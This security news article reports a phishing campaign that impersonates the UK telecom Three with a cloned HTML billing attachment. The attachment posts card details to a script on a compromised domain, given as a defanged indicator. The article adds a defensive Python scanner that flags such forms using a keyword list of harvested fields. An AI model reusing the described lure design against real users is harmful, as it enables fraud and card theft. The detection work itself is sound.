The phishing emails purport to come from the UK telecom provider Three through a legitimate-looking email address, ‘online@three[.]co[.]uk’.
A phishing attack directed at the customers of a UK telecom provider has been uncovered recently. The attack purports to come from Three, a British telecommunications and internet service provider.
How does it operate?
The Cofense researchers revealed that the attack relies on a well-spoofed HTML file that prompts users to share their personal and credit card details. This phishing file comes attached in an email.
The targeted customers are informed that their bill payment could not be processed by the bank and are therefore asked to download the HTML file ‘3GUK[.]html’ to edit their billing information to avoid suspension of service.
Further investigation revealed that the source code is a clone of actual HTML code on a legitimate page of the UK-based telecom provider Three. In order to make it look convincing, the email includes ‘online@three[.]co[.]uk’ as the sender email address.
Any information provided by a victim is processed by the ‘processing[.]php’ script located at hxxp://joaquinmeyer[.]com/wb/processing[.]php, a domain the adversaries have compromised.
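The mechanism described above (a cloned HTML attachment whose form posts card details to an unrelated host) is something a mail gateway or analyst can check for directly. The following is an added example, not code from the original report or from Cofense: it parses an attachment, collects each form's action and input names, and flags forms that harvest sensitive fields while posting to a host outside the brand's domain. The sample HTML and the `compromised-site.example` host are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Substrings of input names a billing-update lure typically harvests (assumed list).
SENSITIVE_FIELDS = {"card", "cvv", "cvc", "expiry", "password", "sortcode", "account"}


class FormScanner(HTMLParser):
    """Collects each <form> action and the names of the inputs it submits."""

    def __init__(self):
        super().__init__()
        self.forms = []        # each entry: {"action": str, "fields": [input names]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = (a.get("name") or a.get("id") or "").lower()
            if name:
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def scan_attachment(html, brand_domain):
    """Return forms that post outside brand_domain and ask for sensitive data."""
    scanner = FormScanner()
    scanner.feed(html)
    findings = []
    for form in scanner.forms:
        host = (urlparse(form["action"]).hostname or "").lower()
        on_brand = host == brand_domain or host.endswith("." + brand_domain)
        sensitive = sorted(f for f in form["fields"]
                           if any(k in f for k in SENSITIVE_FIELDS))
        if host and not on_brand and sensitive:
            findings.append({"action": form["action"], "fields": sensitive})
    return findings


# Constructed sample mimicking the lure: cloned branding, form posting to an unrelated host.
SAMPLE = """<html><body><h1>Update your billing details</h1>
<form method="post" action="http://compromised-site.example/wb/processing.php">
<input name="fullname"><input name="cardnumber"><input name="expiry"><input name="cvv">
<button>Update</button></form></body></html>"""

if __name__ == "__main__":
    for f in scan_attachment(SAMPLE, "three.co.uk"):
        print("suspicious form ->", f["action"], "harvests", f["fields"])
```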
Final words
Users should always be wary of unsolicited requests to download and open HTML/HTM file attachments. These attachments are used as a channel by attackers to distribute malware designed to steal personal information from users.